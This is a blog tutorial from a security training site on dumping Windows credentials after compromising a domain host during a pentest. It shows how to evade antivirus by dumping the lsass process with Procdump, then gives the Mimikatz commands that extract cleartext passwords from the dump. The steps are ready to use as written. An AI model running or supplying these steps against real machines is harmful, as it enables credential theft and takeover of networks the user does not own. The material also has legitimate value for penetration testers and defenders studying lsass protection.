Tutorial: Extracting Passwords

February 22, 2017 | Views: 9643

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

I want to share one of the ways of extracting the password from a machine even when there is an antivirus agent installed on it.

A pentester aims to compromise the domain and become the domain admin. Often I have observed that compromising a domain host is easy. This can be achieved by exploiting a vulnerability in the host using a vulnerability scanner such as Nessus or Nmap NSE scripts. Once a host in the domain is compromised we should extract all the information possible from it. One of the crucial things to extract is the passwords stored in it. When we talk about dumping passwords, the first thing that comes to a pen testers mind is Mimikatz, a great tool developed by Benjamin Delpy.

Unfortunately, Mimi Katz is easily detected by any antivirus and is deleted the moment it is transferred to the compromised machine. What comes to our rescue is another tool called as Procdump. This tool is developed by Microsoft so there is no chance that the anti-virus installed on the host will ever delete it. Procdump is a command line utility which monitors application spikes and can also serve as a general process dump utility that you can embed in other scripts. You can download it from the technet.microsoft.com website and can transfer it to the compromised host with ease.

Using the Procdump utility you can easily dump the lsass process, this can be done using the following command:

C:UsersparichayDownloadsProcdump>procdump.exe -ma -64 lsass.exe pass.dmp (-64 is for 64 bit OS)

This dump can be used to extract clear text passwords using our beloved MimiKatz. The command to extract the clear text password from the dump is:

The command to extract the clear text password from the dump is:

mimikatz # sekurlsa::minidump pass.dmp

mimikatz # sekurlsa::logonPasswords full

One thing that you should know before using MimiKatz on the extracted dump is the Windows NT compatibility. Make sure that the version of windows from which you extract the password and the windows machine that you will use to extract the passwords should be the same version. Please refer to this Wikipedia source for more: https://en.wikipedia.org/wiki/Windows_NT

Please refer to this Wikipedia source for more: https://en.wikipedia.org/wiki/Windows_NT

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. HOW TO use this tool sir?

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?